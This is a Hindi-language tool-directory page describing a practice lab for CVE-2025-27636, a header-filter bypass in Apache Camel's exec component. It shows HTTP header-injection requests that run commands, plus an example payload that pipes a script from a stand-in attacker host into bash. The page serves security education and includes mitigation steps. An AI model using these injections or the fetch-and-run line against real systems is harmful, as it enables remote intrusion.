Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/enochgitgamefied/cve-2025-27636-practical-lab
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubenochgitgamefied/cve-2025-27636-practical-lab

CVE-2025-27636-Practical-Lab

# CVE-2025-27636 के पुनरुत्पादन हेतु व्यावहारिक प्रयोगशाला Apache Camel में केस-सेंसिटिव हेडर फ़िल्टर बायपास के माध्यम से होने वाला एक गंभीर RCE (रिमोट कोड एक्ज़ीक्यूशन) दोष। exec एंडपॉइंट के ज़रिए मनमाने कमांड निष्पादित करने हेतु हेडर इंजेक्शन का प्रदर्शन करता है।

रिपॉजिटरी देखें
210 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🛡️ CVE-2025-27636 — Apache Camel के लिए प्रैक्टिकल एक्सप्लॉइटेशन लैब

🔍 अवलोकन

CVE-2025-27636 Apache Camel में एक गंभीर रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है, विशेष रूप से camel-exec घटक में। यह एक सूक्ष्म लेकिन खतरनाक समस्या से उत्पन्न होती है:

DefaultHeaderFilterStrategy हेडर नामों पर केस-सेंसिटिव जाँच करता है, जिसे वैकल्पिक केसिंग का उपयोग करके बायपास किया जा सकता है।

इसका मतलब है कि आंतरिक Camel हेडर—जैसे CamelExecCommandExecutable—जिन्हें ब्लॉक किया जाना चाहिए, यदि उनकी केसिंग में हेरफेर किया जाए (उदा., cAmeLexecCommandExecutable) तो वे बायपास हो सकते हैं।

जब यह हेडर exec: एंडपॉइंट तक पहुँचता है, तो एक हमलावर मनमाने कमांड इंजेक्ट कर सकता है, जिससे सिस्टम पूरी तरह से कॉम्प्रोमाइज़ हो सकता है।


📌 तकनीकी पृष्ठभूमि

✅ DefaultHeaderFilterStrategy

Apache Camel का DefaultHeaderFilterStrategy आंतरिक हेडर को सुरक्षित रखने के लिए है, जैसे:

  • CamelHttp*
  • CamelFile*
  • CamelExecCommandExecutable ← 🚨 यदि केसिंग फ़िल्टर को बायपास कर दे तो संवेदनशील

🔍 "Internal" का क्या अर्थ है? आंतरिक हेडर वे हैं:

Camel* से प्रीफ़िक्स्ड होते हैं केवल Camel के भीतर व्यवहार नियंत्रित करने के लिए उपयोग किए जाते हैं (रूटिंग, प्रोसेसिंग, एंडपॉइंट्स) HTTP, JMS आदि जैसी बाहरी प्रणालियों को उजागर करने के लिए अभिप्रेत नहीं हैं

हालाँकि, पैच से पहले, यह फ़िल्टर हेडर नामों का केस-सेंसिटिव मिलान करता था, जो HTTP स्पेक का उल्लंघन है (जहाँ हेडर केस-इनसेंसिटिव होते हैं) और ऐसे बायपास की अनुमति देता है:

root@kitploit:~
GET /systeminfo HTTP/1.1
Host: target-ip:8484
cAmeLexecCommandExecutable: /bin/bash -c "touch /tmp/pwned"

यह हेडर exec: घटक को पास कर दिया जाएगा, जो फिर पेलोड को निष्पादित करता है।

🛠️ CamelExecCommandExecutable

यह हेडर camel-exec घटक को बताता है कि कौन-सा कमांड चलाना है। यह शक्तिशाली है—और अत्यंत खतरनाक—यदि उपयोगकर्ता-नियंत्रित हो, विशेष रूप से उन वातावरणों में जो OS-स्तरीय कमांड (जैसे bash, cmd.exe, आदि) का समर्थन करते हैं।


🧪 हैंड्स-ऑन लैब: Pinewood Server Diagnostic

प्रोजेक्ट: Pinewood Server Diagnostic लेखक: @enochgitgamefied लक्ष्य: एक लाइव, शैक्षिक लैब में CVE-2025-27636 को रिप्रोड्यूस करना।


🔗 GitHub रिपॉज़िटरी

👉 https://github.com/enochgitgamefied/CVE-2025-27636-Pratctical-Lab


📁 प्रोजेक्ट अवलोकन

  • Apache Camel 4.10.0 के साथ निर्मित

  • रूट्स:

    • /tasks → exec:tasklist या exec:ps का उपयोग करके टास्क सूचीबद्ध करता है
    • /systeminfo → OS जानकारी आउटपुट करता है (systeminfo या uname -a)
    • /network → ipconfig या ifconfig दिखाता है
  • वेब UI एम्बेडेड Jetty का उपयोग करके / पर सर्व होता है

  • यदि फ़िल्टरिंग पैच नहीं की गई है तो मॉडिफ़ाइड-केस हेडर इंजेक्शन के लिए संवेदनशील


⚙️ आरंभ करना

root@kitploit:~
# Clone the repository
git clone https://github.com/enochgitgamefied/CVE-2025-27636-Pratctical-Lab.git
cd CVE-2025-27636-Pratctical-Lab

# Package the app
mvn clean package

# Run it
java -jar target/hello-camel-1.0-SNAPSHOT.jar

फिर अपने ब्राउज़र में जाएँ:

🖥️ http://<your-ip>:8484


🚨 भेद्यता का प्रदर्शन

अनपैच किया गया व्यवहार:

यदि आप इस तरह का हेडर भेजते हैं (केसिंग पर ध्यान दें):

root@kitploit:~
cAmeLexecCommandExecutable: whoami

फ़िल्टर इसे ब्लॉक नहीं करता, और यह exec: एंडपॉइंट को पास हो जाता है। आप प्रदर्शित कर सकते हैं:

  • whoami
  • uname -a
  • bash -c "curl http://attacker.com/shell.sh | bash" ← खतरनाक

🎥 YouTube डेमो

एक पूर्ण प्रदर्शन तैयार किया जा रहा है और जल्द ही अपलोड किया जाएगा। इसमें निम्नलिखित शामिल होंगे:

  • एप्लिकेशन सेटअप
  • हेडर इंजेक्शन
  • कमांड निष्पादन
  • निवारण के चरण

YouTube पर डेमो लिंक https://www.youtube.com/watch?v=z4Xf9LYXc9o&t=714s!


🛡️ शमन और समाधान

  1. Apache Camel को केस-इनसेंसिटिव हेडर फ़िल्टरिंग वाले संस्करण में अपग्रेड करें (यह पैच किया गया है)।
  2. यदि आपको सख्त लॉजिक लागू करना ही है तो कस्टम HeaderFilterStrategy का उपयोग करें।
  3. जब तक पूरी तरह लॉक डाउन न किया जाए, exec: रूट्स को सीधे HTTP पर एक्सपोज़ न करें।

🧠 मुख्य निष्कर्ष

  • आंतरिक हेडर बाहरी उपयोगकर्ताओं द्वारा कभी भी नियंत्रित नहीं होने चाहिए।
  • सुरक्षा फ़िल्टर में केस सेंसिटिविटी एक प्रसिद्ध एंटी-पैटर्न है।
  • Apache Camel शक्तिशाली है, लेकिन उस शक्ति के साथ ज़िम्मेदारी भी आती है—विशेष रूप से HTTP को exec से जोड़ते समय।

⚠️ अस्वीकरण

यह लैब केवल शैक्षिक और नियंत्रित लैब उद्देश्यों के लिए डिज़ाइन की गई है। अनधिकृत सिस्टम या नेटवर्क पर कभी भी इसका प्रयास न करें।

Apache Camel2
टूल डाउनलोड करें